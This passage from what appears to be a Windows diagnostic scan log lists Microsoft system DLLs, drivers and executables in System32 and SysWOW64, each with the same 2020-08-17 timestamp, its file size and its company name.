2020-08-17 21:33 - 2020-08-17 21:33 - 000776192 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000775480 _____ (Microsoft Corporation) C:\Windows\system32\securekernel.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000772096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000769336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncHost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000769024 _____ (Microsoft Corporation) C:\Windows\system32\NgcIsoCtnr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000768528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000768488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000762880 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.PrinterCustomActions.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000757632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfreadwrite.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000752584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000750080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000749568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mprddm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000749568 _____ (Microsoft Corporation) C:\Windows\system32\FrameServer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000747832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000744960 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2013CustomActions.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000744248 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000743224 _____ (Microsoft Corporation) C:\Windows\system32\AppVReporting.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000740664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DismApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000740352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000739840 _____ (Microsoft Corporation) C:\Windows\system32\cscsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000739328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mspaint.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000738064 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000736768 _____ (Microsoft Corporation) C:\Windows\system32\RDXService.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000734720 _____ (Microsoft Corporation) C:\Windows\system32\lpksetup.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000732000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ortcengine.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000729600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FlightSettings.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000724480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fveapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000718336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.AccountsControl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000717312 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.FileExplorer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000710144 _____ (Microsoft Corporation) C:\Windows\system32\odbc32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\AppReadiness.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000705536 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000702976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BTAGService.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Mirage.Internal.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000699904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d8.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000696832 _____ (Microsoft Corporation) C:\Windows\system32\wlidcli.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dsreg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000695208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000694784 _____ (Microsoft Corporation) C:\Windows\system32\gpprefcl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000692224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000692224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comdlg32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000692224 _____ (Microsoft Corporation) C:\Windows\system32\LockController.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000690536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000690176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkObjCore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000689664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Search.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsSpellCheckingFacility.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Ocr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000683848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PCPKsp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000682744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000680448 _____ (Microsoft Corporation) C:\Windows\system32\vpnike.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Core.TextInput.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000676072 _____ (Microsoft Corporation) C:\Windows\system32\WUDFx02000.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000675040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000675024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000674304 _____ (Microsoft Corporation) C:\Windows\system32\wiaaut.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000674280 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000673088 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000672256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000671744 _____ (Microsoft Corporation) C:\Windows\system32\wiaservc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000671040 _____ (Microsoft Corporation) C:\Windows\system32\computecore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000670720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000669184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EdgeManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000668672 _____ (Microsoft Corporation) C:\Windows\system32\wsecedit.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000667136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000666624 _____ (Microsoft Corporation) C:\Windows\system32\configmanager2.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000666424 _____ (Microsoft Corporation) C:\Windows\system32\AppVCatalog.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000666280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000664576 _____ (Microsoft Corporation) C:\Windows\system32\rdbui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000663040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MrmIndexer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000661816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000655360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentApis.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000654336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uReFS.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000653824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Management.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000652800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000651264 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOMEX.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000649728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000649016 _____ (Microsoft Corporation) C:\Windows\system32\AppVPublishing.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000643584 _____ (Microsoft Corporation) C:\Windows\system32\AssignedAccessManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000640000 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000639488 _____ (Microsoft Corporation) C:\Windows\system32\twinapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000639488 _____ (Microsoft Corporation) C:\Windows\system32\srmscan.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000639400 _____ (Microsoft Corporation) C:\Windows\system32\msvcp_win.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000634880 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000633344 _____ (Microsoft Corporation) C:\Windows\system32\SyncController.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000632320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000629760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SmartcardCredentialProvider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000629760 _____ (Microsoft Corporation) C:\Windows\system32\ipnathlp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000629248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Storage.Search.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000628416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000628024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LicensingWinRT.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000623104 _____ (Microsoft Corporation) C:\Windows\system32\resutils.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000623104 _____ (Microsoft Corporation) C:\Windows\system32\facecredentialprovider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000619008 _____ (Microsoft Corporation) C:\Windows\system32\azroles.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000618496 _____ (Microsoft Corporation) C:\Windows\system32\CredProvDataModel.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000618296 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000614912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\efswrt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000614912 _____ (Microsoft Corporation) C:\Windows\system32\netprofmsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000612864 _____ (Microsoft Corporation) C:\Windows\system32\dmenrollengine.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000609280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000606720 _____ (Microsoft Corporation) C:\Windows\system32\uxtheme.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000605896 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000604160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\odbc32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000602224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000600064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ActivationManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000599552 _____ (Microsoft Corporation) C:\Windows\system32\SmsRouterSvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000598528 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000597816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wimgapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000596992 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000594992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Perception.Stub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000593920 _____ (Microsoft Corporation) C:\Windows\system32\psisdecd.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000593480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000593408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000588800 _____ (Microsoft Corporation) C:\Windows\system32\msra.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000587064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupEngine.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000586768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000584704 _____ (Microsoft Corporation) C:\Windows\system32\PlayToManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000584192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000582056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.applicationmodel.datatransfer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000580608 _____ (Microsoft Corporation) C:\Windows\system32\ddraw.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000579584 _____ (Microsoft Corporation) C:\Windows\system32\rasdlg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000578560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Connectivity.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000576512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\csc.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000575488 _____ (Microsoft® Windows® Operating System) C:\Windows\system32\wvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000574976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_9.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000574464 _____ (Microsoft Corporation) C:\Windows\system32\msTextPrediction.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000573952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Graphics.Printing.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000572200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryPS.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000571904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiaaut.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000570368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Import.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000568128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comctl32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000567808 _____ (Microsoft Corporation) C:\Windows\system32\PhotoScreensaver.scr
2020-08-17 21:33 - 2020-08-17 21:33 - 000565248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Gaming.Input.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000564736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpprefcl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000564488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StateRepository.Core.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000562688 _____ (Microsoft Corporation) C:\Windows\system32\iprtrmgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000562176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000561464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000558080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSDApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000557056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ChatApis.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000557056 _____ (Microsoft Corporation) C:\Windows\system32\netshell.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000555520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000555008 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl
2020-08-17 21:33 - 2020-08-17 21:33 - 000553664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreMessaging.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000551824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sxs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000551824 _____ (Microsoft Corporation) C:\Windows\system32\MFPlay.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000551424 _____ (Microsoft Corporation) C:\Windows\system32\DeviceEnroller.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000549376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000546816 _____ (Microsoft Corporation) C:\Windows\system32\dxdiagn.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000543824 _____ (Microsoft Corporation) C:\Windows\system32\policymanager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000542288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000541696 _____ (Microsoft Corporation) C:\Windows\system32\ResourceMapper.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000540672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.SmartCards.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000540200 _____ (Microsoft Corporation) C:\Windows\system32\DMRServer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000539648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d9on12.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000538664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000538624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ngccredprov.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000537608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000535552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JpMapControl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000535040 _____ (Microsoft Corporation) C:\Windows\system32\rasgcw.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000534016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000533504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000531464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TextInputFramework.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000530944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ddraw.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000529920 _____ (Microsoft Corporation) C:\Windows\system32\wwanmm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000529920 _____ (Microsoft Corporation) C:\Windows\system32\nltest.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000526848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlidprov.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000526336 _____ (Microsoft Corporation) C:\Windows\system32\bdesvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000525824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsecedit.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000524208 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000522240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.System.Launcher.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000521728 _____ (Microsoft Corporation) C:\Windows\system32\WinBioDataModel.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000518656 _____ (Microsoft Corporation) C:\Windows\system32\ncsi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000518464 _____ (Microsoft Corporation) C:\Windows\system32\WerFault.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000516544 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000516096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iprtrmgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000515600 _____ (Microsoft Corporation) C:\Windows\system32\dcntel.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000514560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000513576 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000513536 _____ (Microsoft Corporation) C:\Windows\system32\imapi2.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000513024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000513024 _____ (Microsoft Corporation) C:\Windows\system32\scesrv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000512000 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.Desktop.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000510792 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000510768 _____ (Microsoft Corporation) C:\Windows\system32\systemreset.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000510464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dmenrollengine.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000508720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000508216 _____ (Microsoft Corporation) C:\Windows\system32\spwizeng.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000506368 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.PredictionUnit.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000505856 _____ (Microsoft Corporation) C:\Windows\system32\InputSwitch.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000503808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FXSCOMEX.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000502784 _____ C:\Windows\system32\AssignedAccessCsp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000502784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.appcore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000501760 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.LockScreen.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000501200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp_win.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000500736 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2020-08-17 21:33 - 2020-08-17 21:33 - 000500224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncController.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000500224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhotoScreensaver.scr
2020-08-17 21:33 - 2020-08-17 21:33 - 000500224 _____ (Microsoft Corporation) C:\Windows\system32\mprdim.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.FileExplorer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlidcli.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\azroles.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000497664 _____ (Microsoft Corporation) C:\Windows\system32\werui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000497152 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000495104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasdlg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000494904 _____ (Microsoft Corporation) C:\Windows\system32\TransportDSA.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000494080 _____ (Microsoft Corporation) C:\Windows\system32\defragsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000490496 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000487784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000487576 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase_enclave.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000487424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppcext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000486912 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000486400 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000484864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\psisdecd.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000484352 _____ (Microsoft Corporation) C:\Windows\system32\MixedReality.Broker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000483328 _____ (Microsoft Corporation) C:\Windows\system32\SessEnv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000478296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000478208 _____ (Microsoft® Windows® Operating System) C:\Windows\SysWOW64\wvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000477496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-08-17 21:33 - 2020-08-17 21:33 - 000477184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uxtheme.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000477184 _____ (Microsoft Corporation) C:\Windows\system32\SharedRealitySvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000476672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\resutils.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000475648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxbde40.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000475648 _____ (Microsoft Corporation) C:\Windows\system32\DscCore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000473600 _____ (Microsoft Corporation) C:\Windows\system32\rdpshell.exe
